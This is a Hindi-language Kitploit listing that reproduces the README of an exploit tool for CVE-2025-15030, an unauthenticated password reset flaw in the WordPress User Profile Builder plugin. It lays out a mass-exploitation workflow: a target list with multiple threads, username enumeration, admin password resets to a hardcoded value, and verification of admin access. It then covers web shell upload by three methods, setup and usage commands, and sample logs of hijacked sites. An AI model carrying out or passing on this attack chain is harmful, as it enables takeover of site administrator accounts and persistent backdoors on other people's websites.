Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-15030 — User Profile Builder < 3.15.2 - बिना प्रमाणीकरण के मनमाना पासवर्ड रीसेट | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-15030
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnxploited/cve-2025-15030

CVE-2025-15030

User Profile Builder < 3.15.2 - बिना प्रमाणीकरण के मनमाना पासवर्ड रीसेट

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-15030

User Profile Builder < 3.15.2 - बिना प्रमाणीकरण मनमाना पासवर्ड रीसेट

CVE-2025-15030

User Profile Builder — बिना प्रमाणीकरण पासवर्ड रीसेट → एडमिन अधिग्रहण + शेल अपलोड

root@kitploit:~
 ____  _     _____      ____  ____  ____  ____        _  ____  ____ _____  ____
/   _\/ \ |\/  __/     /_   \/  _ \/_   \/ ___\      / \/ ___\/  _ \\__  \/  _ \
|  /  | | //|  \ _____  /   /| / \| /   /|    \_____ | ||    \| / \|  /  || / \|
|  \__| \// |  /_\____\/   /_| \_/|/   /_\___ |\____\| |\___ || \_/| _\  || \_/|
\____/\__/  \____\     \____/\____/\____/\____/      \_/\____/\____//____/\____/

CVE CVSS Plugin Auth Python Author


❶ भेद्यता

मूल कारण:
Profile Builder प्लगइन की पासवर्ड पुनर्प्राप्ति प्रक्रिया (action2=recover_password2) रीसेट कुंजी को ठीक से मान्य नहीं करती और न ही टोकन समाप्ति लागू करती है। रीसेट पृष्ठ से निकाले गए वैध password_recovery_nonce_field2 के साथ एक विशेष रूप से तैयार POST सबमिट करके, एक बिना प्रमाणीकृत हमलावर केवल उपयोगकर्ता नाम जानकर किसी भी WordPress उपयोगकर्ता — जिसमें व्यवस्थापक भी शामिल हैं — के लिए नया पासवर्ड सेट कर सकता है। किसी ईमेल इंटरैक्शन या वैध रीसेट टोकन की आवश्यकता नहीं है।


❷ टूल क्या करता है

यह टूल प्रत्येक लक्ष्य के विरुद्ध दो स्वतंत्र हमला श्रृंखलाएँ लागू करता है, दोनों के बाद वैकल्पिक शेल परिनियोजन होता है:

root@kitploit:~
┌────────────────────────────────────────────────────────────────────┐
│  CHAIN 1 · CORE  (wp-login native reset abuse)                    │
│                                                                    │
│  POST /wp-login.php?action=lostpassword  (trigger reset)          │
│  GET  /wp-login.php?action=rp&key=...    (follow reset link)      │
│  POST /wp-login.php?action=resetpass     (inject new password)    │
│  Enumerate usernames  →  brute strict login  →  verify /wp-admin/ │
├────────────────────────────────────────────────────────────────────┤
│  CHAIN 2 · PB  (Profile Builder reset-from-link)                  │
│                                                                    │
│  Load reset URLs from pb_reset_links.txt                          │
│  GET  <reset_url>  →  extract nonce + userData                    │
│  POST action2=recover_password2  →  set new password              │
│  Strict login  →  verify /wp-admin/ access                        │
├───────────────────────────────────────────────────────────��────────┤
│  SHELL UPLOAD  (runs after any confirmed admin hit)               │
│                                                                    │
│  Method 1  →  plugin-install.php upload  (Nxploited.zip)          │
│  Method 2  →  REST API  /wp-json/wp/v2/plugins                    │
│  Method 3  →  Plugin/Theme editor  (write Nx.php directly)        │
│  Verify    →  GET /wp-content/plugins/Nxploited/Nx.php            │
│  Log       →  scan_results/shells.txt                             │
└────────────────────────────────────────────────────────────────────┘

❸ सेटअप

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-15030.git
cd CVE-2025-15030
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
rich>=13.0.0

शेल अपलोड सक्षम करने के लिए Nxploited.zip को स्क्रिप्ट के समान निर्देशिका में रखें। टूल इसके बिना भी चलता है लेकिन शेल परिनियोजन छोड़ दिया जाएगा।


❹ उपयोग

root@kitploit:~
python3 CVE-2025-15030.py

प्रॉम्प्ट

root@kitploit:~
Targets list file (one URL per line):            list.txt
Threads (concurrent sites) [5]:                  5
HTTP timeout (seconds) [10]:                     10
Output file for core wp-login reset successes:   scan_results/wp_login_reset_success.txt
Output file for Nxploited shells:                scan_results/shells.txt
Profile Builder reset links file (optional):     pb_reset_links.txt

सभी रीसेट और लॉगिन प्रयासों के लिए उपयोग किया जाने वाला पासवर्ड आंतरिक रूप से निर्धारित है:

root@kitploit:~
Nxploited_adminSA

❺ इनपुट फ़ाइलें

list.txt — लक्ष्य (आवश्यक)

root@kitploit:~
https://target1.com
target2.com
http://target3.com/wordpress

pb_reset_links.txt — Profile Builder रीसेट लिंक (वैकल्पिक)

यदि आपने Profile Builder से पासवर्ड रीसेट ईमेल लिंक कैप्चर किए हैं, तो उन्हें यहाँ एक प्रति पंक्ति पेस्ट करें। टूल निम्न करेगा:

  1. रीसेट पृष्ठ लोड करेगा और password_recovery_nonce_field2 + userData निकालेगा
  2. action2=recover_password2 के माध्यम से नया पासवर्ड सबमिट करेगा
  3. नई साख के साथ सख्त एडमिन लॉगिन का प्रयास करेगा
root@kitploit:~
https://target1.com/wp-login.php?action=rp&key=ABC123&login=admin
https://target2.com/?page_id=5&action=recover_password&key=XYZ&login=editor

❻ उपयोगकर्ता नाम एन्यूमरेशन

टूल लॉगिन का प्रयास करने से पहले तीन विधियों का उपयोग करके स्वचालित रूप से WordPress उपयोगकर्ता नाम खोजता है:

विधिएंडपॉइंट
लेखक पुनर्निर्देशन/?author=1 →

❼ एडमिन सत्यापन

परिणाम लिखने से पहले प्रत्येक लॉगिन प्रयास की सख्ती से पुष्टि की जाती है। टूल जाँचता है:

root@kitploit:~
/wp-admin/index.php       →  id="adminmenu", id="wpadminbar"
/wp-admin/users.php       →  users.php indicator
/wp-admin/plugins.php     →  plugins.php indicator
/wp-admin/plugin-install.php  →  upload-plugin, plugin-install-tab

कोई परिणाम केवल तभी डिस्क पर लिखा जाता है जब ≥ 3 एडमिन मार्कर की पुष्टि हो जाती है।


❽ शेल अपलोड विधियाँ

पुष्टि किए गए एडमिन सत्र के बाद टूल क्रम से तीन एस्केलेशन विधियों का प्रयास करता है:

शेल सत्यापन: GET /wp-content/plugins/Nxploited/Nx.php → HTTP 200


❾ आउटपुट फ़ाइलें

फ़ाइलसामग्री
scan_results/wp_login_reset_success.txtCORE श्रृंखला के माध्यम से पुष्टि किए गए एडमिन हिट
scan_results/shells.txtसाख के साथ परिनियोजित शेल URL

प्रारूप

wp_login_reset_success.txt

root@kitploit:~
[2025-06-01T14:22:10] https://target.com | https://target.com/wp-login.php | account=admin  pass=Nxploited_adminSA

shells.txt

root@kitploit:~
[2025-06-01 14:22:18] https://target.com - admin:Nxploited_adminSA - SHELL: https://target.com/wp-content/plugins/Nxploited/Nx.php

❿ टर्मिनल आउटपुट प्रारूप

root@kitploit:~
[host]  https://target.com
CORE: KEY=OK  , RESET=OK  , ACCESS=1   |
PB:   KEY=FAIL, RESET=FAIL, ACCESS=0   |
SHELL: OK       | LOGIN: https://target.com/wp-login.php

⓫ लेखक

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


⓬ अस्वीकरण

root@kitploit:~
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears zero responsibility for any use of this tool
against systems the operator does not own or have explicit
written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws
worldwide and may result in criminal prosecution.

You alone are responsible for your actions.

© 2025 Nxploited · User Profile Builder < 3.15.2 · 3.15.2 में ठीक किया गया

टूल डाउनलोड करें
फ़ील्डविवरण
CVECVE-2025-15030
CVSS9.8 क्रिटिकल — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ADPCISA-ADP
प्लगइनवर्डप्रेस के लिए User Profile Builder
प्रभावित3.15.2 से पहले के सभी संस्करण
प्रमाणीकरणकोई आवश्यकता नहीं
प्रकारअनुचित पासवर्ड रीसेट — बिना प्रमाणीकरण खाता अधिग्रहण
CWECWE-640 · कमज़ोर पासवर्ड पुनर्प्राप्ति तंत्र
/?author=10
REST API/wp-json/wp/v2/users
होस्टनाम अनुमानीडोमेन नाम का पहला लेबल
डिफ़ॉल्ट फ़ॉलबैकadmin हमेशा शामिल
विधिएंडपॉइंटट्रिगर
प्लगइन अपलोड/wp-admin/update.php?action=upload-pluginइंस्टॉल फ़ॉर्म के माध्यम से Nxploited.zip अपलोड करता है
REST API/wp-json/wp/v2/pluginsसीधा ZIP POST
संपादक लेखन/wp-admin/plugin-editor.phpफ़ाइल संपादक के माध्यम से Nx.php लिखता है
कॉलम
अर्थ
KEYरीसेट प्रवाह सफलतापूर्वक आरंभ हुआ
RESETसर्वर द्वारा नया पासवर्ड स्वीकार किया गया
ACCESSपुष्टि किए गए एडमिन लॉगिन की संख्या
SHELLOK यदि Nx.php लाइव पुष्टि हो